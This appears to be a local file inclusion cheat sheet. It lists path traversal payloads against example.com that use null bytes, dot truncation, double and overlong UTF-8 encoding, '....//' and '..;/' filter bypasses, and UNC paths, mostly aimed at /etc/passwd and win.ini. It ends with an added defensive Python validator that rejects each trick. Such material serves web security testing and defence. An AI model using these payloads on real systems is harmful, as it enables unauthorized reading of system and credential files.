LFI
NULL CHARACTER:
Sometimes applications append extra characters, like a file extension, to the input variable. A null byte makes the application ignore everything that follows it.
original→ index.php?somefile=image.jpeg
testing → index.php?somefile=../../../../etc/passwd%00image.jpeg
Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863
===========================================================
Dot Truncation:
In PHP, file names longer than 4096 bytes are truncated; the characters after that limit are ignored.
http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd
Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/
=======================================================
Encoding:
Manipulating variables that reference files with "dot-dot-slash" (../) sequences and their variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.
Char | URL | Double URL | UTF-8                   | 16-bit Unicode
.    | %2e | %252e      | %c0%2e %e0%40%ae %c0%ae | %u002e
/    | %2f | %252f      | %c0%2f %e0%80%af %c0%af | %u2215
\    | %5c | %255c      | %c0%5c %c0%80%5c        | %u2216
Encoded ../:
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
Encoded ..\:
%2e%2e%5c
%252e%252e%255c
%c0%ae%c0%ae%c0%5c
%uff0e%uff0e%u2216
Double URL Encoding :
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
UTF-8 Encoding:
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Bypass Filtering:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Bypass ../ removal:
..././
...\.\
Bypass ../ filtering with a semicolon (..;/):
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt
Windows UNC Share:
Windows UNC shares can be injected to redirect access to other resources.
\\localhost\c$\windows\win.ini
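A defensive counterpart to the list above, added here as an example and not part of the original page: a Python check that decodes a user-supplied file name the same way these bypasses rely on (repeated percent-decoding, on bytes rather than text), refuses each listed pattern, and only then resolves the name under a document root. BASE_DIR and the reason strings are assumptions for this example; POSIX path semantics are assumed.

```python
import os
from urllib.parse import unquote_to_bytes

# Assumed document root for this example (not from the original page).
BASE_DIR = os.path.realpath("/var/www/images")


def decode_fully(raw: str, max_rounds: int = 3) -> bytes:
    """Percent-decode until the value stops changing, so %252e and %2e both
    end up as '.'. Works on bytes so an overlong sequence such as %c0%ae
    shows up as the raw bytes 0xC0 0xAE instead of being silently replaced."""
    current = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(current)
        if decoded == current:
            return decoded
        current = decoded
    raise ValueError("too many encoding layers")


def check_path(raw: str, base_dir: str = BASE_DIR):
    """Return (allowed, reason, resolved_path) for a user-supplied file name.

    Rejects the tricks listed above (null bytes, %u and double encoding,
    overlong UTF-8, '....//' and '..;/' segments, backslash separators,
    absolute and UNC paths) and confirms the result stays under base_dir."""
    try:
        decoded = decode_fully(raw)
    except ValueError as exc:
        return False, str(exc), None
    if b"\x00" in decoded:
        return False, "null byte", None
    if b"%u" in decoded.lower():
        return False, "%u encoding", None
    if any(byte > 0x7F for byte in decoded):
        return False, "non-ascii byte", None
    text = decoded.decode("ascii").replace("\\", "/")
    for segment in text.split("/"):
        # '..', '....' and '..;' all start with '..'; ';' is never valid here
        if segment.startswith("..") or ";" in segment:
            return False, "traversal segment", None
    # os.path.join drops base_dir when text is absolute; realpath then
    # normalises '.', '//' and symlinks so the containment check is honest.
    target = os.path.realpath(os.path.join(base_dir, text))
    if os.path.commonpath([base_dir, target]) != base_dir:
        return False, "escapes base", None
    return True, "ok", target
```

Because backslashes are folded into '/', the UNC example above becomes an absolute path outside BASE_DIR and is refused by the containment check rather than by a pattern match.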